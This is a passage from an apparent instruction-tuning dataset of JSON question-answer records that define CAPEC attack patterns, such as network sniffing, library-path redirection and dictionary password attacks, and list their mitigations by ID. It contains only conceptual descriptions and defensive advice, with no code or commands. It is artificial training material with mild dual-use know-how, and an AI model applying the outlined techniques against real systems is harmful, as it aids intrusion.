might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache."}, {"instruction": "What is", "input": "Sniffing Attacks", "output": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. AiTM attacks are predominantly active and often alter the content of the communications themselves."}, {"instruction": "What is", "input": "coa-157-0", "output": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception."}, {"instruction": "What is", "input": "Sniffing Network Traffic", "output": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information."}, {"instruction": "What is", "input": "coa-158-0", "output": "Obfuscate network traffic through encryption to prevent its readability by network sniffers."}, {"instruction": "What is", "input": "coa-158-1", "output": "Employ appropriate levels of segmentation to your network in accordance with best practices."}, {"instruction": "What is", "input": "Redirect Access to Libraries", "output": "An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation."}, {"instruction": "What is", "input": "coa-159-0", "output": "Implementation: Restrict the permission to modify the entries in the configuration file."}, {"instruction": "What is", "input": "coa-159-1", "output": "Implementation: Check the integrity of the dynamically linked libraries before use them."}, {"instruction": "What is", "input": "coa-159-2", "output": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries."}, {"instruction": "What is", "input": "Dictionary-based Password Attack", "output": "\n An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Dictionary Attacks differ from similar attacks such as Password Spraying (CAPEC-565) and Credential Stuffing (CAPEC-600), since they leverage unknown username/password combinations and don't care about inducing account lockouts.\n "}, {"instruction": "What is", "input": "coa-16-0", "output": "Create a strong password policy and ensure that your system enforces this policy."}, {"instruction": "What is", "input": "coa-16-1", "output": "Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2."}, {"instruction": "What is", "input": "coa-16-2", "output": "Leverage multi-factor authentication for all authentication services."}, {"instruction": "What is", "input": "Exploit Script-Based APIs", "output": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support